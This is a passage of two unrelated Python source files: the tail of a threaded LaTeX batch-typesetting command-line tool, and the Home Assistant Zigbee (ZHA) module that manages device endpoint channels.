\\tableofcontents
\\newpage
"""
post_doc = """
\\end{document}"""
if len(error_list) > 0:
if self.arg_pack.recursive == True:# Input must be directory
base_dir = os.path.abspath(self.arg_pack.input[0])
error_report_dir = os.path.join(base_dir,'__WarningReport__')
error_report_file = os.path.join(error_report_dir, '__WarningReport__.tex')
else:# Non-recursive, file list input, currently same as recursive
base_dir = os.path.abspath(os.path.join(self.arg_pack.input[0],os.pardir))
error_report_dir = os.path.join(base_dir,'__WarningReport__')
error_report_file = os.path.join(error_report_dir, '__WarningReport__.tex')
if os.path.isdir(error_report_dir) == True:
logger.warning('"{}" directory already exists. Directory name adjusted using current time for unique name.'.format(error_report_dir))
error_report_dir = error_report_dir + '{}'.format(time.time())
error_report_file = os.path.join(error_report_dir, '__WarningReport__{}.tex'.format(time.time()))
os.makedirs(error_report_dir)
f1 = open(error_report_file,'w')
f1.write(pre_doc)
for line in error_list:
f1.write(line)
f1.write(post_doc)
f1.close()
self.arg_pack.tex_queue.put(error_report_file)
def escapeTexString(self,string): # Returns TeX-friendly string
logger.debug('Running escapeTexString')
rep = { # define desired replacements in this dictionary (mapping)
'&': '\\&',
'%': '\\%',
'#': '\\#',
'_': '\\_',
'{': '\\{', # REGEX Special
'}': '\\}', # REGEX Special
'~': '\\char"007E{}', # LaTeX Special
'$': '\\$', # REGEX Special
'\\': '\\char"005C{}', # REGEX/LaTeX Special
'^': '\\char"005E{}', # REGEX/LaTeX Special
'"': '\\char"FF02{}',
'[': '\\char"005B{}', # Left Square Bracket
']': '\\char"005D{}', # Left Square Bracket
}
# use these two lines to do the replacement (could be shortened to one line)
pattern = re.compile("|".join(map(re.escape,rep.keys()))) # Create single pattern object (key to simultaneous replacement)
new_string = pattern.sub(lambda match: rep[match.group(0)], string)
return new_string
class TypesetThread(threading.Thread):# was called "TypesetDocuments"
def __init__(self, arg_pack):
super().__init__()
self.arg_pack = arg_pack # self makes var available across class
def run(self): # called by threadingobject.start() (thread.start())
while self.arg_pack.stop_flag.isSet() == False: # Check stop_flag at thread start
try: # if queue is empty, run queue.Empty
item = self.arg_pack.tex_queue.get_nowait()# thread pulls item from task queue
self.typesetFile(item)
except queue.Empty:
break # exit while when queue is empty
else:
self.arg_pack.tex_queue.task_done()
while self.arg_pack.stop_flag.isSet() == True: # loop thru remaining tasks. I opted to have threads do this themselves rather than SignalHandler
try: #
item = self.arg_pack.tex_queue.get_nowait()# thread pulls item from task queue
logger.debug('TypesetThread: Detected stopflag. Removing job "{}" from the Queue.'.format(item))
except queue.Empty:
break
else:
self.arg_pack.tex_queue.task_done()
if self.arg_pack.stop_flag.is_set() == True:# Check stop_flag again for log message
logger.info('TypesetThread: Detected stopflag. Rejoining thread {} to main thread.'.format(threading.get_ident()))
logger.debug('TypesetThread: Queue empty? {}'.format(self.arg_pack.tex_queue.empty())) # join waits for queue to be empty
# self.arg_pack.tex_queue.task_done() # unblock Queue so thread can return
#return # optional, by default all methods end in return
def typesetFile(self,tex_file):
parent_dir = os.path.dirname(os.path.abspath(tex_file))
tex_file_name = os.path.basename(tex_file)
# -halt-on-error: ensure that xelatex stops on errors without presenting a console
# -interaction=nonstopmode:
# -file-line-error: makes it easier to identify errors in inputted files
# command = 'xelatex -interaction=nonstopmode -halt-on-error -file-line-error "{}"'.format(tex_file_name)
command = '{} {}'.format(self.arg_pack.typesetter, tex_file_name)
thread = threading.current_thread()
round_step = 0
timeout = 300
logger.debug('typesetFile: interations: {}'.format(self.arg_pack.iterations[0]))
for round_step in range(self.arg_pack.iterations[0]):
if self.arg_pack.stop_flag.is_set() == False:
logger.info('Starting: \n {}\n Thread ID: {} Round: {} at: {} Timeout: {} seconds'.format(command,self.ident,round_step+1,time.time(),timeout))
process = subprocess.Popen(command,stdout=subprocess.PIPE,shell=True,cwd=parent_dir)
try:
proc_stdout = process.communicate(timeout=timeout)[0].strip()
except:
process.kill()
logger.error('Killed process due to timeout:\n Timeout: {} seconds\n {}'.format(timeout,command))
if process.returncode != 0:
logger.error('Failed: \n {}\n Thread ID: {} Round: {} at: {}'.format(command,self.ident,round_step+1,time.time()))
self.arg_pack.failed_queue.put((tex_file, )) # add tuple
self.arg_pack.exitcode = 1
break # escape next highest loop
else:
logger.info('Completed: \n {}\n Thread ID: {} Round: {} at: {}'.format(command,self.ident,round_step+1,time.time()))
if (round_step + 1) == self.arg_pack.iterations[0] and process.returncode < 1: # only add after iterations finished
self.arg_pack.completed_queue.put((os.path.splitext(tex_file)[0]+'.pdf', ))
if (round_step + 1) == self.arg_pack.iterations[0]:
self.arg_pack.completed_queue.put((os.path.splitext(tex_file)[0]+'.log', ))
class ShowHelpOnNoArgsParser(argparse.ArgumentParser):
def error(self, message):
sys.stderr.write('error: %s\n' % (message))
self.print_help()
self.exitcode = 2
sys.exit(self.exitcode)
class Struct(object): # Abstract class for struct
def __init__ (self, **argd):
self.__dict__.update(argd) # Update using dictionary
class ArgStruct(Struct): # Here all types are given that must match argparse types
input = []
recursive = False
daemon = False
depth = 0
output = ""
clean = False
typeset = ""
log = ""
movelogs = False
warning_report = False
error_report = False
thread_limit = 0
iterations = 0
prehook = ""
posthook = ""
verbosity = "INFO"
hook_errors = ""
# Following do not take CLI args
tex_queue = queue.Queue() # List of files to process
stop_flag = threading.Event() # Object for signaling threads
completed_queue = queue.Queue() # Optional for getting results from each thread
failed_queue = queue.Queue() # Object for failed tex files
exitcode = 0
def setupArgPack(parser,arg_struct): # here parser values are assigned to struct values
arg_struct.input = vars(parser.parse_args()).get('input')
arg_struct.recursive = vars(parser.parse_args()).get('recursive')
# arg_struct.daemon = vars(parser.parse_args()).get('daemon')
arg_struct.depth = vars(parser.parse_args()).get('depth')
arg_struct.output = vars(parser.parse_args()).get('output')
arg_struct.clean = vars(parser.parse_args()).get('clean')
arg_struct.typesetter = vars(parser.parse_args()).get('typesetter')
arg_struct.log = vars(parser.parse_args()).get('log')
arg_struct.movelogs = vars(parser.parse_args()).get('movelogs')
arg_struct.warning_report = vars(parser.parse_args()).get('warning_report')
arg_struct.error_report = vars(parser.parse_args()).get('error_report')
arg_struct.thread_limit = vars(parser.parse_args()).get('thread_limit')
arg_struct.iterations = vars(parser.parse_args()).get('iterations')
arg_struct.prehook = vars(parser.parse_args()).get('prehook')
arg_struct.posthook = vars(parser.parse_args()).get('posthook')
arg_struct.hook_errors = vars(parser.parse_args()).get('hook_errors')
arg_struct.verbosity = vars(parser.parse_args()).get('verbosity')
arg_struct.exitcode = 0
return arg_struct
def parseArgs(): # Grab args and return argparse obj
parser = ShowHelpOnNoArgsParser() #argparse.ArgumentParser(description='Process optional arguments.')
parser.add_argument('input',nargs='+', help='Input is required. Input TeX file(s), or a path when using recursive -r')
parser.add_argument('-r', '--recursive',action='store_true', help='Recursively find .tex files to compile. Depth can be set by depth -D.')
# parser.add_argument('-d', '--daemon',action='store_true', help='Run in daemon mode.')
parser.add_argument('-D', '--depth',action='store', nargs=1, type=int, default=[0], help='Set recursive depth. Default: 0 (infinity)')
parser.add_argument('-o', '--output',action='store', dest='output', help='Move PDFs to specified directory. (when combined with -l, move logs also)')
parser.add_argument('-c', '--clean', action='store_true', help='Remove everything in output directory. CAREFUL.')
parser.add_argument('-l', '--log',action='store', nargs=1, default=[], help='Specify log output file. Directory will be created automatically. Existing logs with the same name will be overwritten. Log level is set to INFO unless explicitly set. Debug log is created automatically.')
parser.add_argument('-L', '--movelogs',action='store_true', help='Move logs with pdfs to -o directory.')
parser.add_argument('-w', '--warning_report',action='store', nargs=1, default=[], help='Generate warning report of all logs using a file containing a newline-delimited list of regular expressions to match. When input consists of individual files, the report will be created within the parent directory of the first file.')
parser.add_argument('-e', '--error_report',action='store', nargs=1, default=[], help='Generate error report of all logs using a sfile containing a newline-delimited list of regular expressions to match. When input consists of individual files, the report will be created within the parent directory of the first file. Documents that fail to typeset correctly will also be included.')
parser.add_argument('-t', '--thread_limit', action='store', nargs=1, type=int, default=[4], help='Limit number of simultaneous threads, otherwise use the maximum possible.')
parser.add_argument('-T', '--typesetter',action='store', dest='typesetter', default='xelatex -interaction=nonstopmode -halt-on-error -file-line-error', help='Explicitly set typeset command to be called. e.g. "xelatex -interaction=nonstopmode -halt-on-error -file-line-error"')
parser.add_argument('-i', '--iterations', action='store', nargs=1, type=int, default=[3], help='Specify number of times the TeX file should be typeset/compiled. Default: 3.')
parser.add_argument('-p', '--prehook', action='store', nargs='+', dest='prehook', help='Call external script before processing documents.')
parser.add_argument('-P', '--posthook', action='store', nargs='+', dest='posthook', help='Call external script after processing documents.')
parser.add_argument('-H', '--hook-errors', action='store', nargs=1, default=[], help='Specify path to input file containing a list of hook errors to appear in the error report. It should be formatted in latex code.')
parser.add_argument('-V', '--verbosity',action='store', nargs=1, default=[], help='Set console log message level (lowest to highest: DEBUG,INFO,WARN,ERROR,CRITICAL) or QUIET to supress all messages.')
args_given = vars(parser.parse_args())
logger.debug('Args provided: %s' % (args_given))
return parser # Return parser object
def setLogs(arg_pack):
if len(arg_pack.verbosity) > 0:
logger.info('setLogs: Setting log verbosity.\n Verbosity: {}'.format(arg_pack.verbosity[0]))
for acceptable_log_level in ['DEBUG','INFO','ERROR','WARN','CRITICAL','QUIET']: # set log_level
if acceptable_log_level == arg_pack.verbosity[0]:
log_level = acceptable_log_level
else:# set default
logger.warning('Invalid log level set: {}\n Level: INFO'.format(acceptable_log_level))
log_level = 'INFO'
else:# set default
log_level = 'INFO'
# At this point, log_level contains one valid level
log_level_method = getattr(logging, log_level) # convert log_level to method
# Set console logger level
if log_level == 'QUIET':
logger.debug('Setting console log level to QUIET.')
logger.removeHandler(consoleh)
else:# if not QUIET
logger.debug('Setting log level to {}.'.format(log_level))
consoleh.setLevel(log_level_method)
# Set file logger level
if arg_pack.log != []:# Determine whether log file out desired
log_dir = os.path.abspath(os.path.join(arg_pack.log[0],os.pardir))
try:
os.makedirs(log_dir,exist_ok=True)
except:
raise
# Add file log handler
log_file = logging.FileHandler('{}'.format(arg_pack.log[0]), mode='w', encoding=None, delay=False)# Base logger
log_file.setFormatter(formatter_file)
log_file.setLevel(log_level_method)# set to default
logger.addHandler(log_file)
# Add file log debug handler
log_debug_file = logging.FileHandler('{}'.format('{}.debug.log'.format(arg_pack.log[0])), mode='w', encoding=None, delay=False)
log_debug_file.setFormatter(formatter_file)
log_debug_file.setLevel(logging.DEBUG)
logger.addHandler(log_debug_file)
logger.info('Log level set to: {}'.format(log_level))
def convertToHumanTime(total_time):
days = total_time // 86400
hours = total_time // 3600 % 24
minutes = total_time // 60 % 60
seconds = total_time % 60
human_readable_total_time = '%s hours; %s minutes; %s seconds' % (hours,minutes,seconds)
return human_readable_total_time
def main():
# arg_pack = parseArgsAndBuildPack() # Parse input args and build struct object package to send to texgen
parser_obj = parseArgs()
arg_struct = ArgStruct()
arg_pack = setupArgPack(parser_obj,arg_struct)
setLogs(arg_pack)# As early as possible
start_time = time.time()
texgen = TeXGen(arg_pack)
end_time = time.time()
total_time = end_time - start_time
human_readable_total_time = convertToHumanTime(total_time)
logger.info('Process has ended. Exit code: {}. Time elapsed: {}'.format(arg_pack.exitcode,human_readable_total_time))
sys.exit(arg_pack.exitcode)
if __name__ == "__main__":
main()
|
|
"""Channels module for Zigbee Home Automation."""
from __future__ import annotations
import asyncio
from typing import Any, Dict, List, Optional, Tuple, Union
import zigpy.zcl.clusters.closures
from homeassistant.const import ATTR_DEVICE_ID
from homeassistant.core import callback
from homeassistant.helpers.dispatcher import async_dispatcher_send
from . import ( # noqa: F401 # pylint: disable=unused-import
base,
closures,
general,
homeautomation,
hvac,
lighting,
lightlink,
manufacturerspecific,
measurement,
protocol,
security,
smartenergy,
)
from .. import (
const,
device as zha_core_device,
discovery as zha_disc,
registries as zha_regs,
typing as zha_typing,
)
ChannelsDict = Dict[str, zha_typing.ChannelType]
class Channels:
"""All discovered channels of a device."""
def __init__(self, zha_device: zha_typing.ZhaDeviceType) -> None:
"""Initialize instance."""
self._pools: List[zha_typing.ChannelPoolType] = []
self._power_config = None
self._identify = None
self._semaphore = asyncio.Semaphore(3)
self._unique_id = str(zha_device.ieee)
self._zdo_channel = base.ZDOChannel(zha_device.device.endpoints[0], zha_device)
self._zha_device = zha_device
@property
def pools(self) -> List[ChannelPool]:
"""Return channel pools list."""
return self._pools
@property
def power_configuration_ch(self) -> zha_typing.ChannelType:
"""Return power configuration channel."""
return self._power_config
@power_configuration_ch.setter
def power_configuration_ch(self, channel: zha_typing.ChannelType) -> None:
"""Power configuration channel setter."""
if self._power_config is None:
self._power_config = channel
@property
def identify_ch(self) -> zha_typing.ChannelType:
"""Return power configuration channel."""
return self._identify
@identify_ch.setter
def identify_ch(self, channel: zha_typing.ChannelType) -> None:
"""Power configuration channel setter."""
if self._identify is None:
self._identify = channel
@property
def semaphore(self) -> asyncio.Semaphore:
"""Return semaphore for concurrent tasks."""
return self._semaphore
@property
def zdo_channel(self) -> zha_typing.ZDOChannelType:
"""Return ZDO channel."""
return self._zdo_channel
@property
def zha_device(self) -> zha_typing.ZhaDeviceType:
"""Return parent zha device."""
return self._zha_device
@property
def unique_id(self):
"""Return the unique id for this channel."""
return self._unique_id
@property
def zigbee_signature(self) -> Dict[int, Dict[str, Any]]:
"""Get the zigbee signatures for the pools in channels."""
return {
signature[0]: signature[1]
for signature in [pool.zigbee_signature for pool in self.pools]
}
@classmethod
def new(cls, zha_device: zha_typing.ZhaDeviceType) -> Channels:
"""Create new instance."""
channels = cls(zha_device)
for ep_id in sorted(zha_device.device.endpoints):
channels.add_pool(ep_id)
return channels
def add_pool(self, ep_id: int) -> None:
"""Add channels for a specific endpoint."""
if ep_id == 0:
return
self._pools.append(ChannelPool.new(self, ep_id))
async def async_initialize(self, from_cache: bool = False) -> None:
"""Initialize claimed channels."""
await self.zdo_channel.async_initialize(from_cache)
self.zdo_channel.debug("'async_initialize' stage succeeded")
await asyncio.gather(
*(pool.async_initialize(from_cache) for pool in self.pools)
)
async def async_configure(self) -> None:
"""Configure claimed channels."""
await self.zdo_channel.async_configure()
self.zdo_channel.debug("'async_configure' stage succeeded")
await asyncio.gather(*(pool.async_configure() for pool in self.pools))
@callback
def async_new_entity(
self,
component: str,
entity_class: zha_typing.CALLABLE_T,
unique_id: str,
channels: List[zha_typing.ChannelType],
):
"""Signal new entity addition."""
if self.zha_device.status == zha_core_device.DeviceStatus.INITIALIZED:
return
self.zha_device.hass.data[const.DATA_ZHA][component].append(
(entity_class, (unique_id, self.zha_device, channels))
)
@callback
def async_send_signal(self, signal: str, *args: Any) -> None:
"""Send a signal through hass dispatcher."""
async_dispatcher_send(self.zha_device.hass, signal, *args)
@callback
def zha_send_event(self, event_data: Dict[str, Union[str, int]]) -> None:
"""Relay events to hass."""
self.zha_device.hass.bus.async_fire(
"zha_event",
{
const.ATTR_DEVICE_IEEE: str(self.zha_device.ieee),
const.ATTR_UNIQUE_ID: self.unique_id,
ATTR_DEVICE_ID: self.zha_device.device_id,
**event_data,
},
)
class ChannelPool:
"""All channels of an endpoint."""
def __init__(self, channels: Channels, ep_id: int):
"""Initialize instance."""
self._all_channels: ChannelsDict = {}
self._channels: Channels = channels
self._claimed_channels: ChannelsDict = {}
self._id: int = ep_id
self._client_channels: Dict[str, zha_typing.ClientChannelType] = {}
self._unique_id: str = f"{channels.unique_id}-{ep_id}"
@property
def all_channels(self) -> ChannelsDict:
"""All server channels of an endpoint."""
return self._all_channels
@property
def claimed_channels(self) -> ChannelsDict:
"""Channels in use."""
return self._claimed_channels
@property
def client_channels(self) -> Dict[str, zha_typing.ClientChannelType]:
"""Return a dict of client channels."""
return self._client_channels
@property
def endpoint(self) -> zha_typing.ZigpyEndpointType:
"""Return endpoint of zigpy device."""
return self._channels.zha_device.device.endpoints[self.id]
@property
def id(self) -> int:
"""Return endpoint id."""
return self._id
@property
def nwk(self) -> int:
"""Device NWK for logging."""
return self._channels.zha_device.nwk
@property
def is_mains_powered(self) -> bool:
"""Device is_mains_powered."""
return self._channels.zha_device.is_mains_powered
@property
def manufacturer(self) -> Optional[str]:
"""Return device manufacturer."""
return self._channels.zha_device.manufacturer
@property
def manufacturer_code(self) -> Optional[int]:
"""Return device manufacturer."""
return self._channels.zha_device.manufacturer_code
@property
def hass(self):
"""Return hass."""
return self._channels.zha_device.hass
@property
def model(self) -> Optional[str]:
"""Return device model."""
return self._channels.zha_device.model
@property
def skip_configuration(self) -> bool:
"""Return True if device does not require channel configuration."""
return self._channels.zha_device.skip_configuration
@property
def unique_id(self):
"""Return the unique id for this channel."""
return self._unique_id
@property
def zigbee_signature(self) -> Tuple[int, Dict[str, Any]]:
"""Get the zigbee signature for the endpoint this pool represents."""
return (
self.endpoint.endpoint_id,
{
const.ATTR_PROFILE_ID: self.endpoint.profile_id,
const.ATTR_DEVICE_TYPE: f"0x{self.endpoint.device_type:04x}"
if self.endpoint.device_type is not None
else "",
const.ATTR_IN_CLUSTERS: [
f"0x{cluster_id:04x}"
for cluster_id in sorted(self.endpoint.in_clusters)
],
const.ATTR_OUT_CLUSTERS: [
f"0x{cluster_id:04x}"
for cluster_id in sorted(self.endpoint.out_clusters)
],
},
)
@classmethod
def new(cls, channels: Channels, ep_id: int) -> ChannelPool:
"""Create new channels for an endpoint."""
pool = cls(channels, ep_id)
pool.add_all_channels()
pool.add_client_channels()
zha_disc.PROBE.discover_entities(pool)
return pool
@callback
def add_all_channels(self) -> None:
"""Create and add channels for all input clusters."""
for cluster_id, cluster in self.endpoint.in_clusters.items():
channel_class = zha_regs.ZIGBEE_CHANNEL_REGISTRY.get(
cluster_id, base.ZigbeeChannel
)
# really ugly hack to deal with xiaomi using the door lock cluster
# incorrectly.
if (
hasattr(cluster, "ep_attribute")
and cluster_id == zigpy.zcl.clusters.closures.DoorLock.cluster_id
and cluster.ep_attribute == "multistate_input"
):
channel_class = general.MultistateInput
# end of ugly hack
channel = channel_class(cluster, self)
if channel.name == const.CHANNEL_POWER_CONFIGURATION:
if (
self._channels.power_configuration_ch
or self._channels.zha_device.is_mains_powered
):
# on power configuration channel per device
continue
self._channels.power_configuration_ch = channel
elif channel.name == const.CHANNEL_IDENTIFY:
self._channels.identify_ch = channel
self.all_channels[channel.id] = channel
@callback
def add_client_channels(self) -> None:
"""Create client channels for all output clusters if in the registry."""
for cluster_id, channel_class in zha_regs.CLIENT_CHANNELS_REGISTRY.items():
cluster = self.endpoint.out_clusters.get(cluster_id)
if cluster is not None:
channel = channel_class(cluster, self)
self.client_channels[channel.id] = channel
async def async_initialize(self, from_cache: bool = False) -> None:
"""Initialize claimed channels."""
await self._execute_channel_tasks("async_initialize", from_cache)
async def async_configure(self) -> None:
"""Configure claimed channels."""
await self._execute_channel_tasks("async_configure")
async def _execute_channel_tasks(self, func_name: str, *args: Any) -> None:
"""Add a throttled channel task and swallow exceptions."""
async def _throttle(coro):
async with self._channels.semaphore:
return await coro
channels = [*self.claimed_channels.values(), *self.client_channels.values()]
tasks = [_throttle(getattr(ch, func_name)(*args)) for ch in channels]
results = await asyncio.gather(*tasks, return_exceptions=True)
for channel, outcome in zip(channels, results):
if isinstance(outcome, Exception):
channel.warning("'%s' stage failed: %s", func_name, str(outcome))
continue
channel.debug("'%s' stage succeeded", func_name)
@callback
def async_new_entity(
self,
component: str,
entity_class: zha_typing.CALLABLE_T,
unique_id: str,
channels: List[zha_typing.ChannelType],
):
"""Signal new entity addition."""
self._channels.async_new_entity(component, entity_class, unique_id, channels)
@callback
def async_send_signal(self, signal: str, *args: Any) -> None:
"""Send a signal through hass dispatcher."""
self._channels.async_send_signal(signal, *args)
@callback
def claim_channels(self, channels: List[zha_typing.ChannelType]) -> None:
"""Claim a channel."""
self.claimed_channels.update({ch.id: ch for ch in channels})
@callback
def unclaimed_channels(self) -> List[zha_typing.ChannelType]:
"""Return a list of available (unclaimed) channels."""
claimed = set(self.claimed_channels)
available = set(self.all_channels)
return [self.all_channels[chan_id] for chan_id in (available - claimed)]
@callback
def zha_send_event(self, event_data: Dict[str, Union[str, int]]) -> None:
"""Relay events to hass."""
self._channels.zha_send_event(
{
const.ATTR_UNIQUE_ID: self.unique_id,
const.ATTR_ENDPOINT_ID: self.id,
**event_data,
}
)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.